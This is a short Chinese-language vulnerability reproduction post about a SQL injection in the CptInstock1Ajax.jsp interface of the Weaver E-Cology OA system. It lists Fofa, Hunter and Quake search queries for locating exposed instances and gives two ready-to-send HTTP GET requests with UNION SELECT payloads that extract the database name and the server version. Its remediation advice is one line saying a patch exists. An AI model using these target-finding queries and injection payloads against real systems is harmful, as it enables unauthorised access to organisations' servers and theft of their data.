泛微E-Cology系统 CptInstock1Ajax SQL注入漏洞复现

0x01 产品描述：

 ‌   泛微E-Cology是一款专为中大型组织设计的数字化办公系统，旨在创建高效协同的办公环境。‌ 该系统集成了智能化、平台化和全程数字化的特点，通过智能语音交互、与其他异构系统的集成以及电子印章、电子签名等技术的应用，实现了组织的全面数字化转型‌

0x02 漏洞描述：

        泛微 E-Cology OA协同商务系统前台CptInstock1Ajax接口存在SQL注入漏洞，攻击者可以通过漏洞获取服务器内敏感信息导致信息泄露，甚至通过漏洞写入木马病毒获取服务器权限。 

0x03 搜索语句：

Fofa：app="泛微-OA（e-cology）"

Hunter：body="/wui/common/page/sysRemind.jsp"

Quake：body="/wui/common/page/sysRemind.jsp"

0x04 漏洞复现：

数据库查询：

GET /cpt/capital/CptInstock1Ajax.jsp?id=-99+UNION+ALL+SELECT+DB_Name(),1# HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

 版本查询：

GET /cpt/capital/CptInstock1Ajax.jsp?id=-99+UNION+ALL+SELECT+@@VERSION,1# HTTP/1.1
Host:your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

0x05 修复建议：

厂商已发布补丁 请及时修复。